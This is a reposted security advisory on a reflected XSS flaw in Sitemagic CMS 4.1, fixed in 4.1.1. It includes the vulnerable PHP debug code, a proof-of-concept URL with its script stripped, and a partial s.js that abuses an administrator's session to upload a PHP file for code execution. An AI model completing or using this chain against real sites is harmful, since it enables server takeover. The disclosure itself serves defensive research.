Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Sitemagic CMS 4.1
Fixed in:            4.1.1
Fixed Version Link:  http://ift.tt/1MIfaTR (download parameter: SMDownloadsFile=SitemagicCMS411.zip)
Vendor Contact:      dev@sitemagic.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS: Medium 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description:
If debug mode is enabled, which it is in the default configuration, adding the dump parameter to any request makes index.php echo the contents of $_POST and $_GET without HTML encoding. The result is a reflected XSS vulnerability. Besides injecting JavaScript keyloggers, an attacker can use the XSS to issue requests from a logged-in administrator's browser, which defeats the CSRF protection; in this case that chain leads to code execution (see section 5).

3. Proof of Concept

http://localhost/Sitemagic/?dump=true&foo='">
(The script element that followed the closing quotes was stripped when the advisory was reposted; the foo value only needs to close the surrounding markup and append the script.)

4. Code

index.php:

    if ($debug === true) {
        $end = microtime(true);
        if (isset($_REQUEST["dump"]) === true) {
            $time = $end - $start;
            // Request values are written into the page as-is; nothing is HTML-encoded.
            // The HTML tags inside these strings were lost in the reposted copy;
            // <br> is assumed where the original output had line breaks.
            echo "<br>Memory usage: " . memory_get_usage(true) / 1024 . " KB";
            echo "<br>Time usage: " . $time . " seconds";
            echo "<br>POST<br>" . print_r($_POST, true) . "<br>GET<br>" . print_r($_GET, true) . "<br>";
        }
    }

5. XSS to Code Execution

The file upload in the admin area does not restrict the uploaded file type, so the XSS can be chained to code execution: an administrator who opens the PoC URL has the injected script upload an attacker-chosen file, such as a PHP file, into files/images/demo on the administrator's behalf.

http://localhost/Sitemagic/?dump=true&foo=">
(The injected script element, which loads s.js from an attacker-controlled host, was stripped when the advisory was reposted.)

s.js (the request body, the boundary value and the send() call are truncated in the reposted copy; only the part below survives):

    submitRequest();

    function submitRequest() {
        var xhr = new XMLHttpRequest();
        // Admin file upload endpoint; the victim's browser attaches the admin session.
        xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary" /* boundary value truncated in the source */);
        // The multipart body carrying the uploaded file and the xhr.send() call
        // are truncated in the source.
    }